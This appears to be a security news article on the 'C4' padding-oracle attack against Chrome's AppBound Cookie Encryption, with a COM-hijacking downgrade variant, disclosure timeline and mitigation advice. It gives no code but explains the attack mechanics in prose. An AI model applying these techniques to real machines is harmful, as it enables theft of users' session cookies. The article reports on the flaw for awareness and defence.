In July 2024, Google introduced the AppBound Cookie Encryption feature in Chrome to bolster user data security against infostealer malware. This mechanism employs a dual-layer encryption system utilizing the Windows Data Protection API (DPAPI), first encrypting cookies with User-DPAPI and then re-encrypting them with SYSTEM-DPAPI. Theoretically, this design restricts cookie decryption to processes with SYSTEM-level privileges, thereby safeguarding sensitive information from unauthorized access.
However, researchers have identified a critical vulnerability, termed the C4 (Chrome Cookie Cipher Cracker) attack, that undermines this security measure. The C4 attack exploits a padding oracle vulnerability within the elevation service—a Component Object Model (COM) server operating with SYSTEM privileges responsible for handling cookie decryption requests. By analyzing error messages generated during decryption attempts, attackers can systematically decrypt the outer layer of SYSTEM-DPAPI encryption without requiring elevated privileges.
Mechanism of the C4 Attack:
The C4 attack leverages the AES-CBC encryption mode combined with PKCS7 padding used by DPAPI. When the elevation service processes tampered ciphertext, it produces distinct error messages in the Windows Event Viewer:
– Unknown error for invalid padding.
– MAC check failed error for valid padding but incorrect signatures.
This differential error response creates a padding oracle, enabling attackers to decrypt the SYSTEM-DPAPI layer by systematically modifying ciphertext blocks and analyzing the resulting error messages. The process involves approximately 16 hours of repeated inter-process communication (IPC) requests to the elevation service, coupled with monitoring Windows Event Logs for padding validation responses.
Once the outer encryption layer is decrypted, the inner User-DPAPI encrypted data becomes accessible to low-privileged processes, which can decrypt it using standard CryptUnprotectData calls. This method effectively bypasses the intended security restrictions of the AppBound Cookie Encryption feature.
Alternative Exploitation Method:
Researchers also discovered a simpler exploitation technique involving COM hijacking. By redirecting the elevation service to non-existent binaries, attackers can force Chrome to revert to legacy encryption methods. While this approach requires less technical expertise, it results in the loss of previously encrypted cookies, posing a different set of challenges for attackers.
Response and Mitigation Efforts:
The vulnerability was responsibly disclosed to Google in December 2024. By February 2025, Google acknowledged the issue and classified it as accepted. As of June 23, 2025, a partial solution has been implemented in Chrome; however, this fix remains disabled by default. A comprehensive resolution is planned for future releases.
Microsoft, on the other hand, has declined to address the underlying DPAPI vulnerability, stating that the issue does not meet their criteria for a security fix due to low practical exploitability.
Implications and Recommendations:
The C4 attack underscores the potential risks associated with combining legacy security mechanisms in novel ways, which can inadvertently introduce new vulnerabilities. Users are advised to stay vigilant by keeping their browsers updated and monitoring official channels for security patches. Organizations should also consider implementing additional security measures, such as endpoint detection and response (EDR) solutions, to detect and mitigate potential exploitation attempts.
As the digital landscape continues to evolve, it is imperative for both developers and users to remain proactive in identifying and addressing security vulnerabilities to maintain the integrity and confidentiality of sensitive information.
